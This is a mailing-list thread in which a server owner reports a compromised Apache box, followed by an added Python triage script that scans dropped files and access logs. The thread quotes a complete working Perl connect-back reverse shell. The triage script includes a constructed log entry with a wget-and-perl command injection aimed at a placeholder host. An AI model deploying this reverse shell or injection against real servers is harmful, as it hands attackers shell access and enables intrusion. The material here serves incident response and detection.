A bit of simple Googling should point you in the right direction...

http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&btnG=Google+Search&meta=

Are you running Twiki open to the internet?

http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html

Will.

On 30/11/05, Ajay Sharma <ssharma@xxxxxxxxxxxxxxxx> wrote:
>
> I have a personal apache/mail server that is getting hacked and I'm not
> sure how the person is getting in. What's happening is that every few
> days, the below script will show up in /tmp as 'dc.txt', owned by apache,
> and then a TON of mail is queued up to a bunch of addresses in
> @uol.com.br.
>
> I initially thought they got in because I had an outdated version of
> 'gallery' installed. I rebuilt the server and updated gallery and
> thought I should be okay. But now they are still getting in and instead
> of blindly rebuilding the server, I need to figure out how they are able
> to run perl scripts on the server.
>
> Any suggestions?
>
> --Ajay
>
> PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
>
> ---------------------------
> #!/usr/bin/perl
> use Socket;
> print "Data Cha0s Connect Back Backdoor\n\n";
> if (!$ARGV[0]) {
>     printf "Usage: $0 [Host] <Port>\n";
>     exit(1);
> }
> print "[*] Dumping Arguments\n";
> $host = $ARGV[0];
> $port = 80;
> if ($ARGV[1]) {
>     $port = $ARGV[1];
> }
> print "[*] Connecting...\n";
> $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
> my $target = inet_aton($host);
> if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
>     die("Unable to Connect\n");
> }
> print "[*] Spawning Shell\n";
> if (!fork( )) {
>     open(STDIN,">&SERVER");
>     open(STDOUT,">&SERVER");
>     open(STDERR,">&SERVER");
>     exec {'/bin/sh'} '-bash' . "\0" x 4;
>     exit(0);
> }
> print "[*] Datached\n\n";
> --------------------------------
> _______________________________________________
> CentOS mailing list
> CentOS@xxxxxxxxxx
> http://lists.centos.org/mailman/listinfo/centos
>
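The script Ajay found is a classic connect-back shell: it opens an outbound TCP socket to the attacker, dups STDIN/STDOUT/STDERR onto that socket and execs /bin/sh, so the attacker gets an interactive shell running as the web-server user. A file like that, owned by apache in /tmp, almost always arrives through a web request that makes the server fetch and run it, which is why the access log is the place to look next. The following is an added triage example, not code from the thread or from any of the projects mentioned in it. It checks a dropped file for the three things a connect-back shell must do, and then scans Apache combined-format log lines for a request whose URL-decoded target looks like a fetch-and-execute injection. Both the file excerpt and the log lines are constructed for the example; the IP addresses, the /cgi-bin/app.cgi path and the 198.51.100.7 host are made up and do not claim anything about how Ajay's box was actually compromised.

```python
import re
from urllib.parse import unquote

# Constructed excerpt (not a copy of any real sample) of the kind of file found in
# /tmp: outbound socket, stdio redirected onto it, shell exec.
SAMPLE_DROPPED_FILE = """#!/usr/bin/perl
use Socket;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\\n");
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\\n"); }
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\\0" x 4;
"""

# Constructed Apache combined-format lines; the second one carries a hypothetical
# fetch-and-execute injection in its query string.
LOG_LINES = [
    '203.0.113.9 - - [30/Nov/2005:03:12:07 -0800] "GET /twiki/bin/view/Main/WebHome HTTP/1.1" 200 5123',
    '203.0.113.9 - - [30/Nov/2005:03:12:41 -0800] "GET /cgi-bin/app.cgi?file=;cd%20/tmp;wget%20http://198.51.100.7/dc.txt;perl%20dc.txt%20198.51.100.7%2080 HTTP/1.1" 200 312',
    '198.51.100.22 - - [30/Nov/2005:03:13:00 -0800] "GET /index.php?page=about HTTP/1.1" 200 2201',
]

# Each indicator is a regex plus a label. A connect-back shell needs the first three;
# the fourth is the hand-packed sockaddr_in this particular family uses.
BACKDOOR_INDICATORS = [
    (r"\bconnect\s*\(", "outbound connect()"),
    (r'open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*"\s*>&', "stdio dup'd onto socket"),
    (r"\bexec\b.*?/bin/(ba)?sh", "exec of a shell"),
    (r"pack\s*\(?\s*[\"']SnA4x8", "hand-packed sockaddr_in"),
]

REQUIRED_FOR_SHELL = {"outbound connect()", "stdio dup'd onto socket", "exec of a shell"}


def scan_dropped_file(text):
    """Return the labels of the connect-back indicators present in `text`."""
    return [label for pattern, label in BACKDOOR_INDICATORS if re.search(pattern, text)]


def is_connect_back_shell(text):
    """True when the file opens an outbound socket, wires stdio onto it and execs a shell."""
    return REQUIRED_FOR_SHELL <= set(scan_dropped_file(text))


# Apache combined log: ip ident user [ts] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Download tools and interpreters an injected command would call...
FETCH_EXEC = re.compile(r"\b(wget|curl|fetch|lynx|perl|python|sh|bash)\b")
# ...plus a shell separator or the world-writable directory they drop into.
SHELL_META = re.compile(r"[;|`]|\$\(|/tmp/?")


def parse_access_log(lines):
    """Yield one dict per parseable line, with the request target URL-decoded."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            req = m.groupdict()
            req["decoded"] = unquote(req["target"])
            yield req


def suspicious_requests(lines):
    """Requests whose decoded target names a fetch/exec tool AND a shell separator or /tmp."""
    hits = []
    for req in parse_access_log(lines):
        tools = sorted(set(FETCH_EXEC.findall(req["decoded"])))
        if tools and SHELL_META.search(req["decoded"]):
            hits.append({"ip": req["ip"], "status": req["status"],
                         "tools": tools, "target": req["decoded"]})
    return hits


if __name__ == "__main__":
    print("dropped file indicators:", scan_dropped_file(SAMPLE_DROPPED_FILE))
    print("connect-back shell:", is_connect_back_shell(SAMPLE_DROPPED_FILE))
    for hit in suspicious_requests(LOG_LINES):
        print(f"{hit['ip']} {hit['status']} {hit['tools']} {hit['target']}")
```

Run it against the real files by reading /tmp/dc.txt into `scan_dropped_file` and feeding `/var/log/httpd/access_log` to `suspicious_requests`; the hit's timestamp and source IP are what tie the dropped file back to the request that created it. The log heuristic is deliberately loose (a literal `sh` in a path will match), so treat a hit as a lead to check against the file's mtime rather than as proof, and remember that a HTTP 200 on the injected request is normal: the command runs server-side and the page itself still renders.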